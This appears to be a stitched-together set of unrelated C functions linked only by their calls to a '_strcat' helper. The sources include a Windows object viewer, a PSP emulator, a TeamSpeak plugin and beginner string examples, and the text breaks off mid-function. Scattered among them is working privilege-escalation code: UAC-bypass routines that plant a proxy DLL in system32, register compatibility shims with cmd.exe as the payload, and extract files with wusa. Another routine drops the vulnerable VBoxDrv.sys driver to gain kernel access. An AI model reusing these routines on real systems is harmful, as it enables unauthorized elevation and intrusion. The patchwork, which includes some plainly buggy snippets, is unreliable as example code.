/*
* exceptShowException
*
* Purpose:
*
* Output exception information to the user.
*
*/
VOID exceptShowException(
EXCEPTION_POINTERS *ExceptionPointers
)
{
WCHAR szMessage[MAX_PATH * 2];
ULONGLONG IdFile;
RtlSecureZeroMemory(&szMessage, sizeof(szMessage));
_strcpy(szMessage, L"Sorry, exception occurred at address: \n0x");
u64tohex((ULONG_PTR)ExceptionPointers->ExceptionRecord->ExceptionAddress, _strend(szMessage));
if (ExceptionPointers->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {
switch (ExceptionPointers->ExceptionRecord->ExceptionInformation[0]) {
case 0:
_strcat(szMessage, L"\n\nAttempt to read at address: \n0x");
break;
case 1:
_strcat(szMessage, L"\n\nAttempt to write at address: \n0x");
break;
}
u64tohex(ExceptionPointers->ExceptionRecord->ExceptionInformation[1], _strend(szMessage));
}
IdFile = GetTickCount64();
if (exceptWriteDump(ExceptionPointers, IdFile)) {
_strcat(szMessage, L"\n\nMinidump wobjex");
u64tostr(IdFile, _strend(szMessage));
_strcat(szMessage, L".dmp is in %TEMP% directory");
}
_strcat(szMessage, L"\n\nPlease report this to the developers, thanks");
MessageBox(GetForegroundWindow(), szMessage, NULL, MB_ICONERROR);
}
/*
* SdtSaveListToFile
*
* Purpose:
*
* Dump table to the selected file
*
*/
VOID SdtSaveListToFile(
_In_ HWND hwndDlg
)
{
WCHAR ch;
INT BufferSize = 0;
INT numitems;
INT row, subitem;
SIZE_T sz, k;
LPWSTR pItem = NULL;
HCURSOR hSaveCursor;
HCURSOR hHourGlass;
WCHAR szTempBuffer[MAX_PATH + 1];
RtlSecureZeroMemory(szTempBuffer, sizeof(szTempBuffer));
_strcpy(szTempBuffer, TEXT("list.txt"));
if (supSaveDialogExecute(hwndDlg, (LPWSTR)&szTempBuffer, TEXT("Text files\0*.txt\0\0"))) {
hHourGlass = LoadCursorW(NULL, IDC_WAIT);
ch = (WCHAR)0xFEFF;
supWriteBufferToFile(szTempBuffer, &ch, sizeof(WCHAR), FALSE, FALSE);
SetCapture(hwndDlg);
hSaveCursor = SetCursor(hHourGlass);
numitems = ListView_GetItemCount(SdtDlgContext.ListView);
for (row = 0; row < numitems; row++) {
output[0] = 0;
for (subitem = 0; subitem < SdtDlgContext.lvColumnCount; subitem++) {
sz = 0;
pItem = supGetItemText(SdtDlgContext.ListView, row, subitem, &sz);
if (pItem) {
_strcat(output, pItem);
HeapFree(GetProcessHeap(), 0, pItem);
}
if (subitem == 1) {
for (k = 54; k > sz / sizeof(WCHAR); k--) {
_strcat(output, TEXT(" "));
}
}
else {
_strcat(output, TEXT("\t"));
}
}
_strcat(output, L"\r\n");
BufferSize = (INT)_strlen(output);
supWriteBufferToFile(szTempBuffer, output, BufferSize * sizeof(WCHAR), FALSE, TRUE);
}
SetCursor(hSaveCursor);
ReleaseCapture();
}
}
/*
* ucmStandardAutoElevation2
*
* Purpose:
*
* Bypass UAC by abusing appinfo g_lpAutoApproveEXEList
*
* UAC contain whitelist of trusted fusion processes with only names and no other special restrictions
* Most of them unknown shit and list does not properly handled by system itself, use this fact.
*
*/
BOOL ucmStandardAutoElevation2(
CONST PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
WCHAR SourceFilePathAndName[MAX_PATH + 1];
WCHAR DestinationFilePathAndName[MAX_PATH + 1];
do {
//source filename of dll
RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
_strcpy(SourceFilePathAndName, g_ctx.szTempDirectory);
_strcat(SourceFilePathAndName, UNBCL_DLL);
if (!supWriteBufferToFile(SourceFilePathAndName, ProxyDll, ProxyDllSize)) {
break;
}
//copy %temp\unbcl.dll -> system32\unbcl.dll
if (!ucmMasqueradedMoveFileCOM(SourceFilePathAndName, g_ctx.szSystemDirectory)) {
break;
}
//source filename of process
RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
_strcpy(SourceFilePathAndName, g_ctx.szSystemDirectory);
_strcat(SourceFilePathAndName, SYSPREP_DIR);
_strcat(SourceFilePathAndName, SYSPREP_EXE);
RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
_strcpy(DestinationFilePathAndName, g_ctx.szTempDirectory);
_strcat(DestinationFilePathAndName, OOBE_EXE);
//system32\sysprep\sysprep.exe -> temp\oobe.exe
if (!CopyFile(SourceFilePathAndName, DestinationFilePathAndName, FALSE)) {
break;
}
//temp\oobe.exe -> system32\oobe.exe
if (!ucmMasqueradedMoveFileCOM(DestinationFilePathAndName, g_ctx.szSystemDirectory)) {
break;
}
RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
_strcpy(DestinationFilePathAndName, g_ctx.szSystemDirectory);
_strcat(DestinationFilePathAndName, OOBE_EXE);
bResult = supRunProcess(DestinationFilePathAndName, NULL);
} while (cond);
return bResult;
}
// 指定した番号のステート呼び出し
boolean PSPEMU_LoadState(uint32 ulNum)
{
char szFilePath[MAX_PATH], szTemp[32];
if (ulNum >= STATE_SLOT_MAX) return FALSE;
GetStatePath(szFilePath, sizeof(szFilePath));
_strcat(szFilePath, NES_ROM_GetRomName());
_strcat(szFilePath, ".ss");
_itoa(ulNum, szTemp);
_strcat(szFilePath, szTemp);
return NES_loadState(szFilePath);
}
/*
* exceptWriteDump
*
* Purpose:
*
* Writes minidump information to the specified file.
*
*/
BOOL exceptWriteDump(
EXCEPTION_POINTERS *ExceptionPointers,
ULONGLONG IdFile
)
{
BOOL bResult;
HANDLE hDbgHelp, hFile;
DWORD dwRetVal;
MINIDUMP_EXCEPTION_INFORMATION mdei;
WCHAR szTemp[MAX_PATH * 2];
bResult = FALSE;
hDbgHelp = GetModuleHandle(L"dbghelp.dll");
if (hDbgHelp == NULL) {
RtlSecureZeroMemory(szTemp, sizeof(szTemp));
if (!GetSystemDirectory(szTemp, MAX_PATH)) {
return bResult;
}
_strcat(szTemp, L"\\dbghelp.dll");
hDbgHelp = LoadLibraryEx(szTemp, 0, 0);
if (hDbgHelp == NULL) {
return bResult;
}
}
pMiniDumpWriteDump = (pfnMiniDumpWriteDump)GetProcAddress(hDbgHelp, "MiniDumpWriteDump");
if (pMiniDumpWriteDump == NULL) {
return bResult;
}
RtlSecureZeroMemory(szTemp, sizeof(szTemp));
dwRetVal = GetTempPath(MAX_PATH, szTemp);
if (dwRetVal > MAX_PATH || (dwRetVal == 0)) {
return bResult;
}
_strcat(szTemp, L"wobjex");
u64tostr(IdFile, _strend(szTemp));
_strcat(szTemp, L".dmp");
hFile = CreateFile(szTemp, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
mdei.ThreadId = GetCurrentThreadId();
mdei.ExceptionPointers = ExceptionPointers;
mdei.ClientPointers = FALSE;
bResult = pMiniDumpWriteDump(GetCurrentProcess(), GetCurrentProcessId(), hFile, MiniDumpNormal, &mdei, NULL, NULL);
CloseHandle(hFile);
}
return bResult;
}
static int
_process_unknown(struct cinfo *info, int base, char *path, const char *name, process_file_callback_t process_file)
{
struct stat st;
int new_len;
new_len = _strcat(base, path, name);
if (new_len < 0)
return -1;
if (stat(path, &st) != 0) {
perror("stat");
return -2;
}
if (S_ISREG(st.st_mode)) {
int r = process_file(info, base, path, name);
if (r >= 0) /* if success and ignore non-fatal errors */
return 0;
return r;
} else if (S_ISDIR(st.st_mode)) {
int r = _process_dir(info, base, path, name, process_file);
if (r >= 0) /* ignore non-fatal errors */
return 0;
return r;
} else {
fprintf(stderr,
"INFO: %s is neither a directory nor a regular file.\n", path);
return -3;
}
}
/*
* Custom code called right after loading the plugin. Returns 0 on success, 1 on failure.
* If the function returns 1 on failure, the plugin will be unloaded again.
*/
int ts3plugin_init() {
// Create the command mutex
hMutex = CreateMutex(NULL, FALSE, NULL);
// Create the PTT delay timer
hPttDelayTimer = CreateWaitableTimer(NULL, FALSE, NULL);
// Find and open the settings database
char db[MAX_PATH];
ts3Functions.getConfigPath(db, MAX_PATH);
_strcat(db, MAX_PATH, "settings.db");
ts3Settings.OpenDatabase(db);
// Find the error sound and info icon
SetErrorSound();
SetInfoIcon();
// Start the plugin threads
pluginRunning = true;
hMailslotThread = CreateThread(NULL, (SIZE_T)NULL, MailslotThread, 0, 0, NULL);
if(hMailslotThread==NULL)
{
ts3Functions.logMessage("Failed to start threads, unloading plugin", LogLevel_ERROR, "NiftyKb Plugin", 0);
return 1;
}
/* Initialize return codes array for requestClientMove */
memset(requestClientMoveReturnCodes, 0, REQUESTCLIENTMOVERETURNCODES_SLOTS * RETURNCODE_BUFSIZE);
return 0; /* 0 = success, 1 = failure */
}
int main(void) {
char s[10] = "one";
char t[10] = "two";
_strcat(s, t);
printf("%s\n", s);
return 0;
}
int initialize()
{
char *str[80];
strcpy(str, "Hello ");
_strcat(str, "World!");
if(strcmp(str, "Hello World!") == 0)
return 1;
else
return 0;
}
HANDLE LoadVulnerableDriver(
VOID
)
{
HANDLE hFile;
HANDLE hDevice;
DWORD bytesIO;
WCHAR szDriverBuffer[BUFFER_SIZE];
//
// Combine full path name for our driver.
//
RtlSecureZeroMemory(szDriverBuffer, BUFFER_SIZE);
if (!GetSystemDirectory(szDriverBuffer, MAX_PATH)) {
return NULL;
}
_strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));
//
// Backup vboxdrv if exists.
//
g_VBoxInstalled = supBackupVBoxDrv(FALSE);
//
// Drop our driver file to the disk.
//
hFile = CreateFile(szDriverBuffer, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
return NULL;
}
bytesIO = 0;
WriteFile(hFile, VBoxDrv, sizeof(VBoxDrv), &bytesIO, NULL);
CloseHandle(hFile);
//
// Check if file dropped OK.
//
if (bytesIO != sizeof(VBoxDrv)) {
return NULL;
}
//
// Open device handle.
//
hDevice = NULL;
if (!scmLoadDeviceDriver(VBoxDrvSvc, szDriverBuffer, &hDevice)) {
return NULL;
}
//
// Driver file is no longer needed.
//
DeleteFile(szDriverBuffer);
return hDevice;
}
int load_dtb(char *name, void *dest, int max_bytes) {
#if CONFIG_DEVTREE == 1
FRESULT res = FR_OK;
unsigned int len;
unsigned long bytes_read;
res = pf_open(name);
if (res != FR_OK) {
putstr("DTB not found\n");
goto err;
}
char str[32];
str[0] = '\0';
_strcat(str, "Open "); _strcat(str, name); _strcat(str, " OK");
_strcat(str, "\n");
putstr(str);
len = pf_size();
if (len > max_bytes || len == 0) {
putstr("Invalid DTB length\n");
goto err;
}
res = pf_lseek(0);
if (res != FR_OK) {
putstr("DTB lseek(0) failed");
goto err;
}
res = pf_read_long(dest, len, &bytes_read);
if (res != FR_OK) {
putstr("DTB read failed");
goto err;
}
putstr("Loaded DTB\n");
return 0;
err:
putstr("Failed to load DTB\n");
return -1;
#else
return -1;
#endif
}
// Write a pointer version of the function strcat
int main(int argc, const char * argv[])
{
char one[] = "Hello,";
char two[] = " world!";
_strcat(one, two);
printf("%s\n", one);
return 0;
}
main(int argc, char *argv[])
{
char buffer[BUFSIZ];
if (argc != 3) {
fprintf(stderr, "usage: strcat <first string> <second string>\n");
return 1;
}
if (strlen(argv[1]) + strlen(argv[2]) > BUFSIZ-1) {
fprintf(stderr, "strcat: string too long\n");
return 1;
}
buffer[0] = '\0';
_strcat(buffer, argv[1]);
_strcat(buffer, argv[2]);
printf("%s\n", buffer);
return 0;
}
// 指定した番号にステート保存
boolean PSPEMU_SaveState(uint32 ulNum)
{
char szFilePath[MAX_PATH], szThumbnailPath[MAX_PATH], szTemp[32];
boolean bRet;
if (ulNum >= STATE_SLOT_MAX) return FALSE;
GetStatePath(szFilePath, sizeof(szFilePath));
_strcat(szFilePath, NES_ROM_GetRomName());
_strcpy(szThumbnailPath, szFilePath);
_strcat(szFilePath, ".ss");
_itoa(ulNum, szTemp);
_strcat(szFilePath, szTemp);
bRet = NES_saveState(szFilePath);
if (bRet) {
_strcat(szThumbnailPath, ".tn");
_strcat(szThumbnailPath, szTemp);
// delete old thumbnail file
sceIoRemove(szThumbnailPath);
_strcat(szThumbnailPath, ".png");
if (setting.savethumbnail) {
// create thumbnail(png)
CreateThumnailFile(szThumbnailPath);
}
else {
// delete thumbnail file
sceIoRemove(szThumbnailPath);
}
}
if (!bRet) sceIoRemove(szFilePath);
return bRet;
}
// 指定した番号にステート削除
boolean PSPEMU_DeleteState(uint32 ulNum)
{
char szFilePath[MAX_PATH], szThumbnailPath[MAX_PATH], szTemp[32], *pszExt;
if (ulNum >= STATE_SLOT_MAX) return FALSE;
GetStatePath(szFilePath, sizeof(szFilePath));
_strcat(szFilePath, NES_ROM_GetRomName());
_strcpy(szThumbnailPath, szFilePath);
_strcat(szFilePath, ".ss");
_itoa(ulNum, szTemp);
_strcat(szFilePath, szTemp);
// delete ss? file
sceIoRemove(szFilePath);
pszExt = _strrchr(szFilePath, '.');
if (pszExt) {
pszExt[1] = 'z';
// delete zs? file
sceIoRemove(szFilePath);
}
_strcat(szThumbnailPath, ".tn");
_strcat(szThumbnailPath, szTemp);
// delete thumbnail file
sceIoRemove(szThumbnailPath);
_strcat(szThumbnailPath, ".png");
// delete thumbnail file(png)
sceIoRemove(szThumbnailPath);
return TRUE;
}
/*
* supShowHelp
*
* Purpose:
*
* Display help file if available.
*
*/
VOID supShowHelp(
VOID
)
{
DWORD dwSize;
HKEY hKey;
LRESULT lRet;
HANDLE hHtmlOcx;
WCHAR szOcxPath[MAX_PATH + 1];
WCHAR szHelpFile[MAX_PATH * 2];
RtlSecureZeroMemory(&szOcxPath, sizeof(szOcxPath));
RtlSecureZeroMemory(szHelpFile, sizeof(szHelpFile));
lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, HHCTRLOCXKEY, 0, KEY_QUERY_VALUE, &hKey);
if (lRet == ERROR_SUCCESS) {
dwSize = MAX_PATH * sizeof(WCHAR);
lRet = RegQueryValueEx(hKey, L"", NULL, NULL, (LPBYTE)szHelpFile, &dwSize);
RegCloseKey(hKey);
if (lRet == ERROR_SUCCESS) {
if (ExpandEnvironmentStrings(szHelpFile, szOcxPath, MAX_PATH) == 0) {
lRet = ERROR_SECRET_TOO_LONG;
}
}
}
if (lRet != ERROR_SUCCESS) {
_strcpy(szOcxPath, HHCTRLOCX);
}
RtlSecureZeroMemory(szHelpFile, sizeof(szHelpFile));
if (!GetCurrentDirectory(MAX_PATH, szHelpFile)) {
return;
}
_strcat(szHelpFile, L"\\winobjex64.chm");
hHtmlOcx = GetModuleHandle(HHCTRLOCX);
if (hHtmlOcx == NULL) {
hHtmlOcx = LoadLibrary(szOcxPath);
if (hHtmlOcx == NULL) {
return;
}
}
if (pHtmlHelpW == NULL) {
pHtmlHelpW = (pfnHtmlHelpW)GetProcAddress(hHtmlOcx, MAKEINTRESOURCEA(0xF));
if (pHtmlHelpW == NULL) {
return;
}
}
pHtmlHelpW(GetDesktopWindow(), szHelpFile, 0, 0);
}
/*
* DllMain
*
* Purpose:
*
* Proxy dll entry point, process parameter if exist or start cmd.exe and exit immediatelly.
*
*/
BOOL WINAPI DllMain(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
)
{
DWORD cch;
TCHAR cmdbuf[MAX_PATH * 2], sysdir[MAX_PATH + 1];
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
UNREFERENCED_PARAMETER(hinstDLL);
UNREFERENCED_PARAMETER(lpvReserved);
if (fdwReason == DLL_PROCESS_ATTACH) {
OutputDebugString(TEXT("Hello, Admiral"));
if (!ucmQueryCustomParameter()) {
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
GetStartupInfoW(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
if ((cch != 0) && (cch < MAX_PATH)) {
RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe"));
if (CreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL,
sysdir, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);
CloseHandle(processInfo.hThread);
if (g_AkagiFlag == AKAGI_FLAG_KILO) {
ucmShowProcessIntegrityLevel();
}
}
}
}
ExitProcess(0);
}
return TRUE;
}
void Log_write(char *pbuf, char *url)
{
memset(buf_header, 0, sizeof(buf_header));
pbuf = (char *)_strcat(pbuf, (char *)inet_ntoa(iph->ip_src));
pbuf = (char *)_strcat(pbuf, "\t");
pbuf = (char *)_strcat(pbuf, itoa(ntohs(tcph->source)));
pbuf = (char *)_strcat(pbuf, "\t");
pbuf = (char *)_strcat(pbuf, (char *)inet_ntoa(iph->ip_dst));
pbuf = (char *)_strcat(pbuf, "\t");
pbuf = (char *)_strcat(pbuf, itoa(ntohs(tcph->dest)));
pbuf = (char *)_strcat(pbuf, "\t");
pbuf = (char *)_strcat(pbuf, url);
pbuf = (char *)_strcat(pbuf, "\t");
*pbuf++ = (tm->tm_year+1900) / 1000 + '0';
*pbuf++ = ((tm->tm_year+1900) % 1000) / 100 + '0';
*pbuf++ = ((tm->tm_year+1900) % 100) / 10 + '0';
*pbuf++ = (tm->tm_year+1900) % 10 + '0';
*pbuf++ = '-';
*pbuf++ = (tm->tm_mon) / 10 + '0';
*pbuf++ = (tm->tm_mon) % 10 + '0';
*pbuf++ = '-';
*pbuf++ = (tm->tm_mday) / 10 + '0';
*pbuf++ = (tm->tm_mday) % 10 + '0';
*pbuf++ = '\t';
*pbuf++ = (tm->tm_hour) / 10 + '0';
*pbuf++ = (tm->tm_hour) % 10 + '0';
*pbuf++ = '-';
*pbuf++ = (tm->tm_min) / 10 + '0';
*pbuf++ = (tm->tm_min) % 10 + '0';
*pbuf++ = '-';
*pbuf++ = (tm->tm_sec) / 10 + '0';
*pbuf++ = (tm->tm_sec) % 10 + '0';
*pbuf++ = '\n';
}
int main(void)
{
char a[] = "Hello world\n";
char *p = a;
int i = 0;
while (p[i] != '\0') {
printf("%c", p[i]);
i++;
}
/* The source string can be const string ie, char * because we are only
* going to iterate over the string. The destination has to be a char
* array or a pointer to malloc array, ie, it should have the required
* amount of memory available with it because the data is going to be
* copied to its location
*/
char *s = "Hello";
char t[6];
_strncpy(s, t, 1);
printf("%s\n", t);
s = "World";
/* Char * can point to a new location because the pointer
* wasn't a const, only the string was.
*/
/* Testing with malloc'd block of data. We need to use strlen on char *
* to get the string size. sizeof will give the size of pointer. Also
* strlen gives length by ignoring \0, we need additional space for that
* as well, thus the +1
*/
char *mp = (char *)malloc(strlen(s) + 1);
_strcpy(s, mp);
printf("%s\n", mp);
char big[12] = "Hello";
char *small = " World";
_strcat(big, small);
printf("Concat: %s\n", big);
struct mystruct m = {
.c = 'c',
.n = 42,
.f = 3.14,
};
printf("%u is the offset of char\n", _offset_of(struct mystruct, c));
printf("%u is the offset of int\n", _offset_of(struct mystruct, n));
printf("%u is the offset of float\n", _offset_of(struct mystruct, f));
printf("%u is the size\n", sizeof(struct mystruct));
}
/*
* SftListThreadPriv
*
* Purpose:
*
* Test unit for thread elevation check.
*
*/
VOID SftListThreadPriv(
VOID
)
{
DWORD dwLen;
bool bRes;
HANDLE hToken;
BYTE *Buffer;
TOKEN_PRIVILEGES *pPrivs;
WCHAR text[MAX_PATH];
if (!OpenThreadToken(NtCurrentThread(), TOKEN_QUERY, FALSE, &hToken))
return;
dwLen = 0;
bRes = GetTokenInformation(
hToken,
TokenPrivileges,
NULL,
0,
&dwLen
);
Buffer = LocalAlloc(LPTR, dwLen);
if (Buffer) {
bRes = GetTokenInformation(
hToken,
TokenPrivileges,
Buffer,
dwLen,
&dwLen
);
pPrivs = (TOKEN_PRIVILEGES*)Buffer;
for (DWORD i = 0; i < pPrivs->PrivilegeCount; i++) {
if (pPrivs->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED) {
text[0] = 0;
ultostr(pPrivs->Privileges[i].Luid.LowPart, text);
_strcat(text, TEXT("\r\n"));
OutputDebugString(text);
}
}
LocalFree(Buffer);
}
CloseHandle(hToken);
}
/*
* ucmAppcompatElevation
*
* Purpose:
*
* AutoElevation using Application Compatibility engine.
*
*/
BOOL ucmAppcompatElevation(
UACBYPASSMETHOD Method,
CONST PVOID ProxyDll,
DWORD ProxyDllSize,
LPWSTR lpszPayloadEXE
)
{
BOOL cond = FALSE, bResult = FALSE;
WCHAR szBuffer[MAX_PATH * 2];
do {
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx.szSystemDirectory);
_strcat(szBuffer, APPHELP_DLL);
hAppHelp = LoadLibrary(szBuffer);
if (hAppHelp == NULL) {
break;
}
if (ucmInitAppHelp() == FALSE) {
break;
}
//create and register shim with RedirectEXE, cmd.exe as payload
if (Method == UacMethodRedirectExe) {
if (lpszPayloadEXE == NULL) {
_strcpy_w(szBuffer, T_DEFAULT_CMD);
bResult = ucmShimRedirectEXE(szBuffer);
}
else {
bResult = ucmShimRedirectEXE(lpszPayloadEXE);
}
return bResult;
}
//create and register shim patch with fubuki as payload
if (Method == UacMethodShimPatch) {
bResult = ucmShimPatch(ProxyDll, ProxyDllSize);
}
} while (cond);
return bResult;
}
ssize_t CFtpTransfer::ReceiveLine(const int client_sockfd, char *pBuffer,int len) {
ssize_t n = 0;
ssize_t sum = 0;
char c = 0;
while((n = read(client_sockfd,&c,1)) > 0 && sum < BUFFER_SIZE){
if(c != '\n'){
if(c != '\r'){
_strcat(pBuffer,c);
sum += n;
}
}
else{
return sum;
}
}
return n;
}
static int
_process_file_single_process(struct cinfo *info, int base, char *path, const char *name)
{
struct sinfo *sinfo = (struct sinfo *)info;
int new_len, r;
void **parser_match = sinfo->parser_match;
struct db *db = sinfo->db;
lms_t *lms = sinfo->common.lms;
new_len = _strcat(base, path, name);
if (new_len < 0)
return -1;
r = _db_and_parsers_process_file(lms, db, parser_match, path, new_len,
base, sinfo->common.update_id);
if (r < 0) {
fprintf(stderr, "ERROR: pid=%d failed to parse \"%s\".\n",
getpid(), path);
_report_progress(info, path, new_len, LMS_PROGRESS_STATUS_ERROR_PARSE);
return r;
}
if (r != LMS_PROGRESS_STATUS_UP_TO_DATE)
sinfo->commit_counter++;
if (sinfo->commit_counter > lms->commit_interval) {
if (!sinfo->total_committed) {
sinfo->total_committed += sinfo->commit_counter;
lms_db_update_id_set(db->handle, sinfo->common.update_id);
}
lms_db_end_transaction(db->transaction_commit);
lms_db_begin_transaction(db->transaction_begin);
sinfo->commit_counter = 0;
}
_report_progress(info, path, new_len, r);
return r;
}
/*
* ucmCreateCabinetForSingleFile
*
* Purpose:
*
* Build cabinet for usage in methods where required 1 file.
*
*/
BOOL ucmCreateCabinetForSingleFile(
LPWSTR lpSourceDll,
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
CABDATA *Cabinet = NULL;
LPWSTR lpFileName;
WCHAR szMsuFileName[MAX_PATH * 2];
if ((ProxyDll == NULL) || (ProxyDllSize == 0)) {
return FALSE;
}
do {
//drop proxy dll
if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
break;
}
//build cabinet
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
Cabinet = cabCreate(szMsuFileName);
if (Cabinet == NULL)
break;
lpFileName = _filename(lpSourceDll);
//put file without compression
bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
cabClose(Cabinet);
} while (cond);
return bResult;
}
/*
* ucmWusaExtractPackage
*
* Purpose:
*
* Extract cab to protected directory using wusa.
*
*/
BOOL ucmWusaExtractPackage(
LPWSTR lpCommandLine
)
{
BOOL bResult = FALSE;
WCHAR szMsuFileName[MAX_PATH * 2];
WCHAR szCmd[MAX_PATH * 4];
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
//extract msu data to target directory
RtlSecureZeroMemory(szCmd, sizeof(szCmd));
wsprintfW(szCmd, lpCommandLine, szMsuFileName);
bResult = supRunProcess(L"cmd.exe", szCmd);
if (szMsuFileName[0] != 0) {
DeleteFileW(szMsuFileName);
}
return bResult;
}
/*
* PipeCreateFullName
*
* Purpose:
*
* Create complete pipe name.
* Caller responsible for cleanup with HeapFree after use.
*
*/
LPWSTR PipeCreateFullName(
_In_ LPWSTR lpObjectName
)
{
LPWSTR lpFullName = NULL;
SIZE_T sz;
if (lpObjectName == NULL) {
return NULL;
}
sz = (_strlen(T_DEVICE_NAMED_PIPE) + _strlen(lpObjectName)) * sizeof(WCHAR) +
sizeof(UNICODE_NULL);
lpFullName = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sz);
if (lpFullName == NULL) {
return NULL;
}
_strcpy(lpFullName, T_DEVICE_NAMED_PIPE);
_strcat(lpFullName, lpObjectName);
return lpFullName;
}
static int
_process_file(struct cinfo *info, int base, char *path, const char *name)
{
struct pinfo *pinfo = (struct pinfo *)info;
int new_len, reply, r;
new_len = _strcat(base, path, name);
if (new_len < 0)
return -1;
if (_master_send_path(&pinfo->master, new_len, base, path) != 0)
return -2;
r = _master_recv_reply(&pinfo->master, &pinfo->poll, &reply,
pinfo->common.lms->slave_timeout);
if (r < 0) {
_report_progress(info, path, new_len, LMS_PROGRESS_STATUS_ERROR_COMM);
return -3;
} else if (r == 1) {
fprintf(stderr, "ERROR: slave took too long, restart %d\n",
pinfo->child);
_report_progress(info, path, new_len, LMS_PROGRESS_STATUS_KILLED);
if (lms_restart_slave(pinfo, _slave_work) != 0)
return -4;
return 1;
} else {
if (reply < 0) {
fprintf(stderr, "ERROR: pid=%d failed to parse \"%s\".\n",
getpid(), path);
_report_progress(
info, path, new_len, LMS_PROGRESS_STATUS_ERROR_PARSE);
return reply;
}
_report_progress(info, path, new_len, reply);
return reply;
}
}
/*
* cuiPrintTextW
*
* Purpose:
*
* Output text to the console or file.
*
* UNICODE variant
*
*/
VOID cuiPrintTextW(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPWSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = (4 + sizeof(UNICODE_NULL) + consoleIO) * sizeof(WCHAR);
Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
consoleIO = _strlen(Buffer);
if (ConsoleOutputEnabled != FALSE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
/*
* DesktopListEnumProc
*
* Purpose:
*
* EnumDesktops callback.
*
*/
BOOL CALLBACK DesktopListEnumProc(
_In_ LPWSTR lpszDesktop,
_In_ LPARAM lParam
)
{
PROP_OBJECT_INFO *Context;
BOOL bSucc;
INT nIndex;
DWORD bytesNeeded, dwDesktopHeapSize;
LPWSTR lpName;
PSID pSID;
SIZE_T sz;
HDESK hDesktop;
LPWSTR StringSid;
LVITEMW lvitem;
WCHAR szBuffer[MAX_PATH];
Context = (PROP_OBJECT_INFO*)lParam;
if (Context == NULL) {
return FALSE;
}
sz = (_strlen(lpszDesktop) * sizeof(WCHAR)) +
(_strlen(Context->lpObjectName) * sizeof(WCHAR)) +
(2 * sizeof(WCHAR)) + sizeof(UNICODE_NULL);
lpName = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sz);
//not enough memory? cancel enum
if (lpName == NULL) {
return 0;
}
_strcpy(lpName, Context->lpObjectName);
_strcat(lpName, L"\\");
_strcat(lpName, lpszDesktop);
//Name
RtlSecureZeroMemory(&lvitem, sizeof(lvitem));
lvitem.mask = LVIF_TEXT | LVIF_IMAGE;
lvitem.iImage = 0;
lvitem.iSubItem = 0;
lvitem.pszText = lpName;
lvitem.iItem = MAXINT;
nIndex = ListView_InsertItem(DesktopList, &lvitem);
HeapFree(GetProcessHeap(), 0, lpName);
//Query desktop objects information
bSucc = FALSE;
StringSid = NULL;
hDesktop = OpenDesktop(lpszDesktop, 0, FALSE, DESKTOP_READOBJECTS);
if (hDesktop) {
//Query SID
bytesNeeded = 0;
GetUserObjectInformation(hDesktop, UOI_USER_SID, NULL, 0, &bytesNeeded);
//user associated with desktop present, query sid
if (bytesNeeded) {
//allocate memory for sid
pSID = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bytesNeeded);
if (pSID) {
if (GetUserObjectInformation(hDesktop,
UOI_USER_SID, pSID, bytesNeeded, &bytesNeeded))
{
bSucc = ConvertSidToStringSid(pSID, &StringSid);
}
HeapFree(GetProcessHeap(), 0, pSID);
}
}
//Add SID string to the list
if (bSucc && StringSid) {
lvitem.mask = LVIF_TEXT;
lvitem.iSubItem = 1;
lvitem.pszText = StringSid;
lvitem.iItem = nIndex;
ListView_SetItem(DesktopList, &lvitem);
